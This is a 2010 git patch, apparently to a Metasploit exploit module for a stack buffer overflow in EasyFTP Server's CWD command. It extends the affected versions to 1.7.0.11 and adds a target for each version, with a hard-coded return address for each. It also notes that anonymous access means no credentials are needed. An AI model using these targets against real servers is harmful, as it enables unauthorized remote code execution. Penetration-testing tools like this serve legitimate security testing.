From cb13ab93cc2f66546417c033027880d9a4ee108f Mon Sep 17 00:00:00 2001
From: Joshua Drake <github.jdrake@qoop.org>
Date: Mon, 26 Apr 2010 21:23:40 +0000
Subject: [PATCH] add additional targets and version notes

git-svn-id: file:///home/svn/framework3/trunk@9147 4d416f70-5f16-0410-b530-b9f4589650da
---
 .../windows/ftp/easyftp_cwd_fixret.rb         | 22 ++++++++++++++-----
 1 file changed, 16 insertions(+), 6 deletions(-)

diff --git a/modules/exploits/windows/ftp/easyftp_cwd_fixret.rb b/modules/exploits/windows/ftp/easyftp_cwd_fixret.rb
index 06d6afc5d7..77b18b519a 100644
--- a/modules/exploits/windows/ftp/easyftp_cwd_fixret.rb
+++ b/modules/exploits/windows/ftp/easyftp_cwd_fixret.rb
@@ -18,14 +18,14 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def initialize(info = {})
 		super(update_info(info,
-			'Name'           => 'EasyFTP Server <= 1.7.0.2 CWD Command Stack Buffer Overflow',
+			'Name'           => 'EasyFTP Server <= 1.7.0.11 CWD Command Stack Buffer Overflow',
 			'Description'    => %q{
-					This module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.2.
-				EasyFTP fails to check input size when parsing 'CWD' commands, which allows for
-				easy stack based buffer overflow exploitation.  EasyFTP allows anonymous access by
+					This module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11
+				and earlier. EasyFTP fails to check input size when parsing 'CWD' commands, which 
+				leads to a stack based buffer overflow.  EasyFTP allows anonymous access by
 				default; valid credentials are typically unnecessary to exploit this vulnerability.
 
-				Later versions may vulnerable, but have not been tested.
+				After version 1.7.0.12, this package was renamed "UplusFtp".
 
 				This exploit utilizes a small piece of code that I\'ve referred to as 'fixRet'.
 				This code allows us to inject of payload of ~500 bytes into a 264 byte buffer by
@@ -40,6 +40,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Version'        => '$Revision$',
 			'References'     =>
 				[
+					[ 'OSVDB', '62134' ],
 					[ 'URL', 'http://paulmakowski.wordpress.com/2010/02/28/increasing-payload-size-w-return-address-overwrite/' ],
 					[ 'URL', 'http://paulmakowski.wordpress.com/2010/04/19/metasploit-plugin-for-easyftp-server-exploit' ],
 					[ 'URL', 'http://seclists.org/bugtraq/2010/Feb/202' ],
@@ -58,7 +59,16 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Platform'	 => 'win',
 			'Targets'        =>
 				[
-					[ 'Windows Universal', { 'Ret' => 0x00404121 } ], # call edi - from ftpbasicsvr.exe
+					[ 'Windows Universal - v1.7.0.2',   { 'Ret' => 0x00404121 } ], # call edi - from ftpbasicsvr.exe
+					[ 'Windows Universal - v1.7.0.3',   { 'Ret' => 0x00404121 } ], # call edi - from ftpbasicsvr.exe
+					[ 'Windows Universal - v1.7.0.4',   { 'Ret' => 0x00404111 } ], # call edi - from ftpbasicsvr.exe
+					[ 'Windows Universal - v1.7.0.5',   { 'Ret' => 0x004040ea } ], # call edi - from ftpbasicsvr.exe
+					[ 'Windows Universal - v1.7.0.6',   { 'Ret' => 0x004040ea } ], # call edi - from ftpbasicsvr.exe
+					[ 'Windows Universal - v1.7.0.7',   { 'Ret' => 0x004040ea } ], # call edi - from ftpbasicsvr.exe
+					[ 'Windows Universal - v1.7.0.8',   { 'Ret' => 0x004043ca } ], # call edi - from ftpbasicsvr.exe
+					[ 'Windows Universal - v1.7.0.9',   { 'Ret' => 0x0040438a } ], # call edi - from ftpbasicsvr.exe
+					[ 'Windows Universal - v1.7.0.10',  { 'Ret' => 0x0040435a } ], # call edi - from ftpbasicsvr.exe
+					[ 'Windows Universal - v1.7.0.11',  { 'Ret' => 0x0040435a } ], # call edi - from ftpbasicsvr.exe
 				],
 			'DisclosureDate' => 'Feb 16 2010',
 			'DefaultTarget' => 0))